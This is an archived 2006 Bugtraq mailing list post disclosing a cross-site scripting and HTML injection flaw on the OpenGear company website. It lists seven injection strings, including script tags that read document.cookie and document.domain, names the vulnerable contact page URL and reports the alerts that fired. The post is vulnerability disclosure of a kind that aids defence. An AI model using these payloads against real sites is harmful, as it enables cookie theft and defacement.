| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060424145040.7998.qmail@securityfocus.com>
Date: 24 Apr 2006 14:50:40 -0000
From: Aditya@...aeye.Org
To: bugtraq@...urityfocus.com
Subject: XSS Bug in OpenGear Server Website
0x0*] Advisory
==============
Web Penetrated By:- Aditya@...aeye.Org
=======================================
Hit :- Site Manipulation.
====
Vulnerability :- XSS Injection && CSS Injection OpenGear WebSite
==============
BrowserStatus :- Windows IE 6.0
==============
Injections :-
========== 0x01] ' && ""
0x02] <script>Javascript:alert("Penetrated");</script>
0x03] <p>Penetrated</p>
0x04] <a href ="www.zeroknock.cjb.net">ZeroKnock</a>
0x05] '';!--"<CSS_Check>=&{()}
0x06] '<script>javascript:alert(document.cookie);</script>
0x07] '<script>javascript:alert(document.domain);</script>
Result:-Opengear.com with alert injection.
0x01] document.domain Injection Yields --> Opengear.com
0x02] document.cookie Injection Yields --> Empty string
0x03] Remote Linking Is Possible <a href=""></a> Working.
0x04] The OutBound Attack Is Also Definitive.
Site :- http://www.Opengear.com
=======
Vulnerable Link:
================ http://www.opengear.com/cm4000_nwcontact.html
Explanation :-
=============
[+] Poorly Coded Modules.
[+] No Patch For Ignorance.
=========================================================